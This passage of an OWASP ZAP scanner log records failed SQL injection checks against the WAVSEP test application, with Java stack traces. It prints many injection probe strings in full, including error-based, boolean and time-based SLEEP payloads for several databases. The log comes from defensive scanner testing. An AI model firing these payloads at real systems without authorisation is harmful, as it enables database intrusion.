org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680658 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini AND 7720=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (7720=7720) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL)-- RHXv] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 7720=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (7720=7720) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL)-- RHXv at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680658 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 6794=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (6794=6794) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 6794=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (6794=6794) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680664 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND 5282=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (5282=5282) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND ('DIsj'='DIsj] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND 5282=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (5282=5282) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND ('DIsj'='DIsj at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680664 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT 2906 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(2906=2906,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/(SELECT 2906 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(2906=2906,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680665 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND 1686=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (1686=1686) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND 'AyPy'='AyPy] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND 1686=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (1686=1686) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND 'AyPy'='AyPy at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680666 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT CONCAT(0x3a7861623a,(SELECT (ELT(4544=4544,1))),0x3a7561713a))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/(SELECT CONCAT(0x3a7861623a,(SELECT (ELT(4544=4544,1))),0x3a7561713a)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680667 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND 7282=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (7282=7282) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND 7282=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (7282=7282) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680667 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT (CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (9639=9639) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/(SELECT (CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (9639=9639) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58))) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680669 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 2047=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (2047=2047) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL)-- qimu] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 2047=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (2047=2047) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL)-- qimu at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680669 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (6301=6301) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (6301=6301) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680670 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini);(SELECT * FROM (SELECT(SLEEP(5)))lJII)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini);(SELECT * FROM (SELECT(SLEEP(5)))lJII)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680671 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT 2490 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(2490=2490,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://(SELECT 2490 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(2490=2490,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at 